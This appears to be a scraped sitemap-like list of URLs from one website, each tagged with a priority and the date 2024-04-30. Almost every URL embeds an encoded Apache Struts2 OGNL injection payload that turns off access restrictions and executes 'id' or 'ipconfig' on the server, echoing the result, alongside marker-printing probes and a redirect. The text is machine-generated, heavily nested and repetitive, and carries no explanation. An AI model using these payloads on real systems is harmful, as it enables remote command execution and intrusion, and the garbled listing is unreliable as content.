http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fdebug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fclass.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdebug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3fmethod%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=f28w8%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f=osm46323%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem98319%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f=osm49436%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem83113%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f=osm63146%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem38536%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3fclass.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 